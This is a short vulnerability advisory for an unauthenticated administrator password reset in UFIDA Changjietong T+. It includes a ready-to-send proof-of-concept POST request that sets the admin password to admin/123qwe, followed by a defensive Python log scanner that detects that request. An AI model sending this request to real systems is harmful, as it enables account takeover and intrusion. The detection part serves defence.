UFIDA Changjietong T+ RecoverPassword.aspx Administrator password modification vulnerability
Vulnerability Description
RecoverPassword.aspx in UFIDA Changjietong T+ allows the administrator password to be changed without authorization. Attackers can use the vulnerability to log in to the management backend.
Vulnerability Impact
UFIDA Changjietong T+
Network Mapping
Vulnerability Reproduction
Login page
Verification PoC: resets the account password to admin/123qwe
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
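A log check for the request above, added here as an example and not part of the original post: it scans IIS W3C access logs for POSTs to the RecoverPassword AjaxPro handler with method=SetNewPwd. The log field layout, the constructed sample lines, and matching only the handler prefix (on the assumption that the App_Web_ suffix can differ between installs) are assumptions.

```python
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C log excerpt (sample data, not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:01 198.51.100.7 GET /tplus/ - 200
2024-01-01 10:00:05 198.51.100.7 POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx method=SetNewPwd 200
2024-01-01 10:02:11 203.0.113.9 POST /TPLUS/AjaxPro/recoverpassword%2CApp_Web_recoverpassword.aspx.0a1b2c3d.ashx METHOD=setnewpwd 200
2024-01-01 10:03:40 192.0.2.15 POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx method=Other 200
2024-01-01 10:04:02 192.0.2.15 GET /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx method=SetNewPwd 404
"""

# Assumption: only the prefix is stable; the App_Web_ suffix may vary per install.
HANDLER_PREFIX = "/tplus/ajaxpro/recoverpassword,"


def find_password_reset_calls(log_text):
    """Return log rows that POST to the RecoverPassword handler's SetNewPwd method."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # W3C logs declare their column order; honour it instead of hard-coding.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # Compare case-insensitively and decode %2C in case the stem is logged encoded.
        stem = unquote(row.get("cs-uri-stem", "")).lower()
        query = parse_qs(row.get("cs-uri-query", "").lower())
        if (row.get("cs-method", "").upper() == "POST"
                and stem.startswith(HANDLER_PREFIX)
                and "setnewpwd" in query.get("method", [])):
            hits.append({k: row.get(k) for k in ("date", "time", "c-ip", "sc-status")})
    return hits


if __name__ == "__main__":
    for hit in find_password_reset_calls(SAMPLE_LOG):
        print(hit)
```

Any hit from an unexpected client address is worth correlating with subsequent administrator logins, since the access log does not record the POST body.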
This post is licensed under CC BY 4.0 by the author.